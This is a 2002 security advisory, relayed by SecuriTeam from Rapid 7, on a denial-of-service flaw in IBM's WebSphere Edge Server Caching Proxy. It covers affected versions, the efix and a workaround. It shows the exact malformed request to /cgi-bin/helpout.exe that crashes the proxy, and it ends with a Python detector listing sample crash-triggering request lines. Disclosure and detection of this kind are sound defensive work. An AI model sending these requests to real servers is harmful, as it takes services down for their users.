[NT] IBM WebSphere Edge Server Caching Proxy Denial of Service

From: support@securiteam.com
To: list@securiteam.com
Date: 23 Oct 2002 23:33:43 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  IBM WebSphere Edge Server Caching Proxy Denial of Service
------------------------------------------------------------------------

SUMMARY

The Caching Proxy component of IBM's WebSphere Edge Server v2.0 is
vulnerable to a denial-of-service attack against one of the default CGI
programs. A malformed HTTP request for /cgi-bin/helpout.exe will cause
ibmproxy.exe to crash and cease functioning.
IBM now bundles Web Traffic Express v4.0 with WebSphere Edge Server v2.0.
IBM Web Traffic Express v3.6 and earlier were separately shipping
products.

DETAILS

Vulnerable systems:
 * IBM Web Traffic Express Caching Proxy Server v4.x (bundled with IBM
WebSphere Edge Server v2.0)
 * IBM Web Traffic Express Caching Proxy Server v3.6

Vendor status and information:
IBM Software - http://www-3.ibm.com/software/webservers/edgeserver/index.html

IBM was notified of this issue and has released efix build number 4.0.1.26
for Caching Proxy Server v4.x, which fixes this issue and other security
issues (see Rapid 7 advisory R7-0008 for more information:
http://www.rapid7.com/advisories/R7-0008.txt).

IBM is tracking this issue as APAR# IY35970.

Solution:
IBM customers should install Caching Proxy efix build 4.0.1.26 or higher.
Efix builds can be downloaded from IBM's secure FTP site. For more
information on obtaining efix builds, contact IBM support with the APAR
number listed above.

This fix has also been ported back to the Web Traffic Express v3.6 code
base. Customers running v3.6 should contact IBM support for more
information on how to upgrade to a newer build.

As a temporary workaround, you can move the file /cgi-bin/helpout.exe to a
non-executable directory until the fix has been applied.

Detailed analysis:
The proxy server will crash when /cgi-bin/helpout.exe is the subject of an
HTTP request that does not include an HTTP version specifier at the end of
the request line.

If you include a version specifier (e.g. "HTTP/1.0"), helpout.exe will
successfully serve up a blank page.

[~] $ telnet localhost 80
Trying 127.0.0.1...
Connected to proxy.victim.com.
Escape character is '^]'.
GET /cgi-bin/helpout.exe HTTP/1.0

HTTP/1.1 200 Document follows
Pragma: no-cache
Last-Modified: Fri, 18 Oct 2002 16:54:40 GMT
Content-Type: text/html
Accept-Ranges: bytes
Connection: close
Date: Fri, 18 Oct 2002 16:54:40 GMT
Server: IBM-PROXY-WTE/2.0

Connection closed by foreign host.

If you send a request with no version specifier, or with a version
specifier that does not include a forward slash (e.g. "HTTP" or ""),
ibmproxy.exe will crash, closing all connections:

[~] $ telnet localhost 80
Trying 127.0.0.1...
Connected to proxy.victim.com.
Escape character is '^]'.
GET /cgi-bin/helpout.exe HTTP

Connection closed by foreign host.

An exception dialog will be displayed on the server console, reading:

ibmproxy.exe - Application Error
The instruction at "0x002662ac" referenced memory at "0x00000000".
The memory could not be "read".

The access violation occurs within the WHTTPD.DLL module.
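As an added detection example (not part of the advisory or of IBM's code), the following Python checks request lines the way the analysis above describes: a request for /cgi-bin/helpout.exe whose version token is absent, or present but without a forward slash, is the crash case, while "HTTP/1.0" is served normally. The sample request lines are constructed for this example; the case-insensitive path comparison is an assumption based on the proxy running on Windows.

```python
import re
from urllib.parse import urlsplit

# Path the advisory names as the crash trigger (compared case-insensitively,
# an assumption because ibmproxy.exe runs on Windows).
HELPOUT_PATH = "/cgi-bin/helpout.exe"

# A version specifier as the advisory describes it must contain a forward
# slash, i.e. the usual "HTTP/major.minor" form.
VERSION_RE = re.compile(r"^HTTP/\d+\.\d+$")

def parse_request_line(line):
    """Split a raw request line into (method, target, version, verdict).

    verdict is 'ok' for a well-formed version token, 'no-version' when the
    token is absent, or 'bad-version' when it is present but lacks the
    slash (the "HTTP" and "" cases from the advisory).
    """
    fields = line.rstrip("\r\n").split(" ")
    if len(fields) < 2 or not fields[0]:
        return None
    method, target = fields[0], fields[1]
    if len(fields) == 2:
        return (method, target, "", "no-version")
    version = " ".join(fields[2:])  # keep trailing junk visible in alerts
    verdict = "ok" if VERSION_RE.match(version) else "bad-version"
    return (method, target, version, verdict)

def targets_helpout(target):
    """True when the request path (absolute URI or path, query ignored) is the CGI."""
    return urlsplit(target).path.lower() == HELPOUT_PATH

def find_crash_triggers(lines):
    """Return the request lines that would crash an unpatched proxy."""
    hits = []
    for line in lines:
        parsed = parse_request_line(line)
        if parsed is not None and parsed[3] != "ok" and targets_helpout(parsed[1]):
            hits.append(line)
    return hits

# Constructed sample request lines, e.g. from a packet capture in front of the proxy.
SAMPLE_REQUEST_LINES = [
    "GET /cgi-bin/helpout.exe HTTP/1.0",              # served normally
    "GET /cgi-bin/helpout.exe HTTP",                  # crash case from the advisory
    "GET /cgi-bin/helpout.exe",                       # no version token at all
    "GET /cgi-bin/HelpOut.EXE?x=1 HTTP/1.1",          # well-formed, served normally
    "GET /index.html HTTP",                           # malformed but not helpout.exe
    "GET http://proxy.example/cgi-bin/helpout.exe ",  # empty version token ("")
]
```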

ADDITIONAL INFORMATION

The advisory can be downloaded by going to:
http://www.rapid7.com/advisories/R7-0007.txt

The information has been provided by Rapid 7 Security Advisories
(advisory@rapid7.com).
